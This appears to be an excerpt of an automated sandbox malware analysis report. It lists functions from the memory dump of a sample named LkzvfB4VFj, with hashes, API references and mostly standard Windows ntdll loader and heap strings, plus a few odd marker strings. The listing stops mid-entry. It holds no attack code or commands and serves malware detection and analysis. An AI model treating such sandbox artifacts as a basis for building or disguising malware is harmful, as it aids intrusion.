                                                  • Instruction ID: 11209e7af1efccc09d24aeeb59e50ac673d0fad16a7fdc02d38645ce41113864
                                                  • Opcode Fuzzy Hash: 510d291c5590aa7c5fdd266263fab21efe8f0117dc9154427c4697ff861a7587
                                                  • Instruction Fuzzy Hash: 7FB189B69083559FD711CF24C884A5FBBE9BF89754F424D2EF889DB240DB70D9088B92
                                                  Function 35FBD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 35FBD879
                                                    • Part of subcall function 35F94779: RtlDebugPrintTimes.NTDLL ref: 35F94817
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: 84f6bcda8680b90e9d655cf0a5845afe1a4513fd88bb7fd27ced210bb203ced5
                                                  • Instruction ID: b5f0f83785d810892364a384cc9d908ded77437cc0b14face8674b15f166fe9b
                                                  • Opcode Fuzzy Hash: 84f6bcda8680b90e9d655cf0a5845afe1a4513fd88bb7fd27ced210bb203ced5
                                                  • Instruction Fuzzy Hash: 1251F176E04349DFEF09CFA5C445B8EBBB2BF44314F224859C905AB281D7B59942CBC2
                                                  Function 35F8D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 35F8D202
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 35F8D0E6
                                                  • @, xrefs: 35F8D24F
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 35F8D263
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 35F8D06F
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 35F8D136
                                                  • @, xrefs: 35F8D2B3
                                                  • @, xrefs: 35F8D09D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  • Opcode ID: fd0aba763280dcd1941f0f69e1469a4b5e46ef5b1c60187e8337dd45d348dce2
                                                  • Instruction ID: 3909391eafa43b05044dc48fbfbd20e398ad9b4201986b67ed5b22f425e87ad8
                                                  • Opcode Fuzzy Hash: fd0aba763280dcd1941f0f69e1469a4b5e46ef5b1c60187e8337dd45d348dce2
                                                  • Instruction Fuzzy Hash: C5A129B25087459FE321CF24C884B5BB7E8BF84759F414D2EF989D6240EB78D908CB92
                                                  Function 3603F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
                                                  • Opcode ID: 8e3f0f2d80a58e9eb6392c0362975b3195c61d68dcf3e29a259675188b50bda7
                                                  • Instruction ID: b6f954c56cefe60a822128fecd0e8119a05838a988d455f95b76bde8c681ed8e
                                                  • Opcode Fuzzy Hash: 8e3f0f2d80a58e9eb6392c0362975b3195c61d68dcf3e29a259675188b50bda7
                                                  • Instruction Fuzzy Hash: 02510336612244EFD701CFA4C985E6ABBF5FF04A69F218CE9F415AB261CA35D940CF50
                                                  Function 35F8F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: a01a12d6fa329223cb543ae90fe304826f9646b807c2970ac1639291b82d6c52
                                                  • Instruction ID: 9fc258d47ad93e4e620c8d8690a3fad4b50ce4bc919f081195b37da2c9582664
                                                  • Opcode Fuzzy Hash: a01a12d6fa329223cb543ae90fe304826f9646b807c2970ac1639291b82d6c52
                                                  • Instruction Fuzzy Hash: 5142EE762087819FD305CF28C884A2ABBEAFF88744F444DADE895CB751DB74E845CB52
                                                  Function 35FAB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: 19c121b01fdd71747236a57e2faf26ca1cf7ca193f511ed0b2c5b25b1af3a6a3
                                                  • Instruction ID: 507759a95b5f7b4f9568f7988c524cd27eb9e857868bb78c3071819cb7fd9e87
                                                  • Opcode Fuzzy Hash: 19c121b01fdd71747236a57e2faf26ca1cf7ca193f511ed0b2c5b25b1af3a6a3
                                                  • Instruction Fuzzy Hash: 40C17877B143159BEB05CB64CC90BBE77B5BF45304F544D6AE802AB2A0EBB4D844CB92
                                                  Function 35FA0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 7809c50f36882ad683b526ed79401282e78907bef45293a29dee7b27236dd32f
                                                  • Instruction ID: 7ef4dd5eae6d04d704ec0cf02ec35fb4be3b82fc49c52a390b93f09d701fedf3
                                                  • Opcode Fuzzy Hash: 7809c50f36882ad683b526ed79401282e78907bef45293a29dee7b27236dd32f
                                                  • Instruction Fuzzy Hash: A2F1EF76604606EFEB05CF68D884F6AB7BAFF44300F1049A8E4169B790D775E981CF91
                                                  Function 35FB9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  • Opcode ID: 320b3ca3dc58caaf035d7382261598588b7d5a3f77fd4e83a23c1fc097c485be
                                                  • Instruction ID: 60b326408043bd6685b674ae939c6aff6bf2e45a0e4572e4c29439ac1aba78ee
                                                  • Opcode Fuzzy Hash: 320b3ca3dc58caaf035d7382261598588b7d5a3f77fd4e83a23c1fc097c485be
                                                  • Instruction Fuzzy Hash: 04512476704305DBEB14DF3ACA80A1A7BF6BF84310F140E6CE55297691EBB4D814CB92
                                                  Function 35FB510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 35FB534B
                                                  • Kernel-MUI-Language-Allowed, xrefs: 35FB519B
                                                  • WindowsExcludedProcs, xrefs: 35FB514A
                                                  • Kernel-MUI-Number-Allowed, xrefs: 35FB5167
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 35FB5272
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: a8a34726bb2f132363252e747a8b44e2249a9fc70bd014d03ead335ee1936be8
                                                  • Instruction ID: 4cec52b7ba7889e38ae467c377467ac1531189b151336fee7384925acea50cb4
                                                  • Opcode Fuzzy Hash: a8a34726bb2f132363252e747a8b44e2249a9fc70bd014d03ead335ee1936be8
                                                  • Instruction Fuzzy Hash: 21F15E76E04219EFDF11CF99C980AEEB7F9FF08650F54485AE901A7250E7B59E01CBA0
                                                  Function 3606ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ebe394a323186bc1c056c460fd6f3f12a723d04b029c3593189e4eb2cb849e4a
                                                  • Instruction ID: 863d6170e544ae958a539b3bfd19b6788f9143d2f1e9e990cfe760035528a695
                                                  • Opcode Fuzzy Hash: ebe394a323186bc1c056c460fd6f3f12a723d04b029c3593189e4eb2cb849e4a
                                                  • Instruction Fuzzy Hash: 04F116B2F002119BDB08DF6AC99267DFFF5EF88204B5541A9D856EB380E774E941CB50
                                                  Function 35F87662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: c59de9b26eb09d710caa7ed6bebd64d4ef37b4fda04fb10d02fbc126d50a2a53
                                                  • Instruction ID: 930a4c012abb5af7bf05b9b0a26eb50515b68c88329c0824c7c5c2c7e63e8aa7
                                                  • Opcode Fuzzy Hash: c59de9b26eb09d710caa7ed6bebd64d4ef37b4fda04fb10d02fbc126d50a2a53
                                                  • Instruction Fuzzy Hash: 17014E37119250AFE319C728D40DF967BB5FB41734F154DDAE4604BAA1CF699840D570
                                                  Function 35F9BDE0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$.mui$.mun$SystemResources\
                                                  • API String ID: 0-3047833772
                                                  • Opcode ID: ecc65b54363121e25d7dcb3668c1cf02dd9ef6afbc81522cc2c18a780de1f55b
                                                  • Instruction ID: 4fbe265eaceb07e3c16fa3ad0971f78c23d44e48d80a9039956a08f7444d92d2
                                                  • Opcode Fuzzy Hash: ecc65b54363121e25d7dcb3668c1cf02dd9ef6afbc81522cc2c18a780de1f55b
                                                  • Instruction Fuzzy Hash: 44625C76B007298FEB25CF54CC40BD9B7B9BB0A354F4049E9D409A7A50DB719E84CF52
                                                  Function 35FA3C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 385f0f5721688bb0953bb494b3bfb65fb8ded2acfb824c7def5ba47b34e7ae4a
                                                  • Instruction ID: 861b3faa54b7eeb2fed7bc677750825adc4d94a14434593162519c6945e70c11
                                                  • Opcode Fuzzy Hash: 385f0f5721688bb0953bb494b3bfb65fb8ded2acfb824c7def5ba47b34e7ae4a
                                                  • Instruction Fuzzy Hash: 93E2F276A04755CFEB15CF68C884BA9BBF1FF48304F1489A9D849AB385D770A841CF92
                                                  Function 35F8F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 7ba760903ed1776c7a35da7f86350aa0df58cee2aaa52191d81848020e53b920
                                                  • Instruction ID: 48cf95740d1a6fe7c36ff5112234ef59d95cebf9a4cd8ec15708334f8dd1ae43
                                                  • Opcode Fuzzy Hash: 7ba760903ed1776c7a35da7f86350aa0df58cee2aaa52191d81848020e53b920
                                                  • Instruction Fuzzy Hash: B661F276208380AFE312CB64DC44F17B7E9FF84758F050DA9EA648B2A1C734D840CB62
                                                  Function 35F890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 2994545307-1391187441
                                                  • Opcode ID: 5f729dad2df4f59887f9131eafa172626b1b1166ee8237294f95921dc0861833
                                                  • Instruction ID: d41d6d61b7286c430ec5c6d7f1956187f10d39ab1a118b1dd26b05d52d873308
                                                  • Opcode Fuzzy Hash: 5f729dad2df4f59887f9131eafa172626b1b1166ee8237294f95921dc0861833
                                                  • Instruction Fuzzy Hash: 0D310436A05204EFDB01CB94CD84F9BB7B9FF447B0F5548A1E825AB291DB30EA41CA60
                                                  Function 3601166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                  • API String ID: 0-1880532218
                                                  • Opcode ID: 53831bf52e5cbade7cb43bfd3b2d03701728de6aa331c76bcbe768160bebb88a
                                                  • Instruction ID: f26114b6a662942d4b849ea9f2f7532d6a187fc0e6cf5c4904aedd94b2927b3f
                                                  • Opcode Fuzzy Hash: 53831bf52e5cbade7cb43bfd3b2d03701728de6aa331c76bcbe768160bebb88a
                                                  • Instruction Fuzzy Hash: AD21727AE01214ABD709CB68DD42B9EBFF5AF45788F1940EAE805A7340EB34D906C790
                                                  Function 35F97072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 80e3061e25540da73d06713c35d95fe6a817a2e9b88e5ce4f6f520783d073ecb
                                                  • Instruction ID: e91135ae1e61aee4d22b7b9cc7b899a7c9b5aaf7395729dcd2ea5f42e1aeeaab
                                                  • Opcode Fuzzy Hash: 80e3061e25540da73d06713c35d95fe6a817a2e9b88e5ce4f6f520783d073ecb
                                                  • Instruction Fuzzy Hash: 27514235A05B05EFFB09EF24C844FADB7B9FF45355F10896AE502976A0DBB0A911CB80
                                                  Function 36023608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  • Opcode ID: d9feab1f054e2e344fe3c4638ecbced764b512a0fa1ca5ff6ff240a849c72740
                                                  • Instruction ID: a721868b90216f641ef4ca9974037b5916be3da9be3980ff20be0dd1f61fee9f
                                                  • Opcode Fuzzy Hash: d9feab1f054e2e344fe3c4638ecbced764b512a0fa1ca5ff6ff240a849c72740
                                                  • Instruction Fuzzy Hash: ABF170B5E002288FDB29CF25CC81B99BBB5EF44744F5484E9DA09A7240EB319EC5CF95
                                                  Function 35F91380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35F91648
                                                  • HEAP[%wZ]: , xrefs: 35F91632
                                                  • HEAP: , xrefs: 35F914B6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: a41bd8584f70722e03e26357099dff93e86072a6d41035581c9e79105c63f1ef
                                                  • Instruction ID: 5e014e27daeb6f8ca6c7b1986ec7e264d8976b1532c02bc91e30e3e11b89a45a
                                                  • Opcode Fuzzy Hash: a41bd8584f70722e03e26357099dff93e86072a6d41035581c9e79105c63f1ef
                                                  • Instruction Fuzzy Hash: 07E10075A04B859BE719DF28C480ABABBF5BF49340F148C6DE496CB245E734E941CB50
                                                  Function 35FBF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 360000F1
                                                  • RTL: Re-Waiting, xrefs: 36000128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 360000C7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 08641cc47caf80bd7022f02a3c1965dda6a459547afe70576e3901b4b362bae2
                                                  • Instruction ID: 2aed76b24a6cafcdd3209ed74882466d49833d3c6d64186a85b4a6fc13d78e75
                                                  • Opcode Fuzzy Hash: 08641cc47caf80bd7022f02a3c1965dda6a459547afe70576e3901b4b362bae2
                                                  • Instruction Fuzzy Hash: 5BE1CE75A08741DFEB11CF69C981B0ABBE1BF84354F100E99F5A58B2E1DBB4D944CB82
                                                  Function 35F9B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: ae1605469535d83fd9e2774f24910d91d60e42aa56959dfcd7a94f8e56ae246b
                                                  • Instruction ID: d1e15132edd70dac294ed36a5c5637fdfca2042e76a9381ddf073cfd536a43bd
                                                  • Opcode Fuzzy Hash: ae1605469535d83fd9e2774f24910d91d60e42aa56959dfcd7a94f8e56ae246b
                                                  • Instruction Fuzzy Hash: A3B19979A08B458BEB19CF64C990B9DB7B6BF84744F104D69E851EBBA0D771E840CB10
                                                  Function 3601330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 1ed93655edd7be14422e5794594f614b7815f22ae22b6bf2ec7cb1f3756e9d81
                                                  • Instruction ID: b811f9a0397205821d96d3ac252404df1149827296d78bed0973616e9cb91454
                                                  • Opcode Fuzzy Hash: 1ed93655edd7be14422e5794594f614b7815f22ae22b6bf2ec7cb1f3756e9d81
                                                  • Instruction Fuzzy Hash: 76B1E379614349AFE315CF61C882F5BBBF8FB44754F414969FA809B280C775E848CB92
                                                  Function 3602327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
